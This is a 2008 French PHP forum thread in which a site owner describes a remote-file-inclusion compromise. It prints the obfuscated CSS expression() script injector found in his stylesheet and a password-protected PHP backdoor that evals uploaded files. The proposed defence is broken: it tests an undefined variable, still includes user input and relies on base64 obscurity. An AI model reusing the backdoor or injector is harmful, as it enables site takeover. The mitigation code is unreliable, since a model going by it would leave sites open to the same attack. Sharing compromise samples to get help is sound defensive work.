ManuelPHP.com
Le forum de la communauté PHP !
Vous n'êtes pas identifié.
#1 14-03-2008 18:42:35
Alert Hacker
Un hacker sévit sur la toile
Si sur votre page, Il y est écris du texte bizard en haut du genre
/* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%38%32%39%37%36%3B%20%4A%53%53%33%20%3D%20%27%2F%69%6D%61%67%65%73%2F%65%66%75%6B%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%69%6D%61%67%65%73%2F%65%66%75%6B%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */
C'est que votre site est piraté.
Ce piratage ne peut avoir lieu que si votre url pour voyager dans votre site est de la forme index.php?page=er.php
En effet le hacker va changer er.php par http://sapage.php
Cela aura pour effet que sa page apparaitra sur votre site et utilisera des fonctions php à votre insu pour créer de nouveau fichier par exemple.
Je vous donne la parade plus tard. Il suffit en faite de vérifier que si $_GET["page"]="http://..." Alors afficher la page anti-hacker.html
A+ pour le code
Hors ligne
#2 17-03-2008 10:52:23
Re: Alert Hacker
avant de donné le code pour parrer à cela, je veux vous faire par de ma réflexion.
Je croit tout dabord que le haker n'a pas pour but de nuire à notre site (La preuve pour mon cas : Le hacker n'a modifier ou
supprimmer aucun de mes fichier(sauf le fichier de style.css)
Par contre il a ajouté des dossier et des fichier.
Son but est d'héberger son site sur le notre afin de faire des choses frauduleuses comme le spamming, ou encore
le piratage d'un site plus interressant. En faisant cela, il se protège, car c'est nous qui sommes responsables. On
commet un délit à notre insue.
Enfin, le haker inscris un code bizarre sur l'entete du site en modifiant le CSS, pour je le croit 2 raisons
Retrouver facilement les sites qu'il pirate
Renseigner au autres hacker que se site est piraté avec d'autres infos. Les chiffres bizarres serait un code entre
hacker.
Ne vous étonné pas si ce code disparrait de votre site(ca mais arrivé. A l'époque je croyait que c'était le serveur
qui avait un problème), car cela veut dire qu'il a commis son délit, et il préfaire ne pas laisser ses traces pour ne pas
le retrouver.
Assez parlé, voilà le code :
$page=$_GET["page"]; //Vous récuperer l'url index.php?page=tapage.php
$tab = explode("http",$url); //on scinde la chaine qu'on enregistre dans un tableau
if($tab[0] == NULL) //Si il y avait un http
include("page_hacker.php");//Afficher par exemple une autre page
else
include($page); //Sinon afficher la page correctement
Allez un petit + pour vous protéger : (uniquement pour ce qui utilise les frames virtuel pour voir les pages : Soit
pour les url : index.php?page=mapage.php&a=3 par exemeple)
Afin de ne pas savoir comment s'appelle votre page que l'on peut voire dans l'url, on peut la coder, et au dernier
moment la décoder. Personnelement j'utilise la fonction base64_encode(), mais je sais pas si c'est la plus approprié.
Bref, il suffit que dans votre lien il y ai par exemple :
<form name="inscrire" method="post" action=<? echo"index.php?page=".base64_encode('mot_de_passe.php').""; ?>>
<input name="F_inscrire" onMouseOver="this.style.color='#99FFFF'" onMouseOut="this.style.color='#00FF30'" onMouseDown="this.style.color='#FFF000'" class="bouton" type="submit" id="F_inscrire" value="Connection"></form>
Enfin pour décripter, il faut décoder avant de faire le test si il y a un http :
$page=base64_decode($page);
Voilà : Encore un conseil : Dans vos Dossier par exemple "images", si vous n'avait pas de fichier index, crée en un
afin que personne puisse voir l'achitecture de votre site. Au plus simple créer le fichier "index.html" dans lequel
vous n'aurrai rien écris. Celà suffira.
Hors ligne
#3 17-03-2008 14:29:07
Re: Alert Hacker
il a écris dans un fichier nommé ereboya.php cela, Je ne sais pas comment son code fonctionne, Si vous avez une idée
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
Hors ligne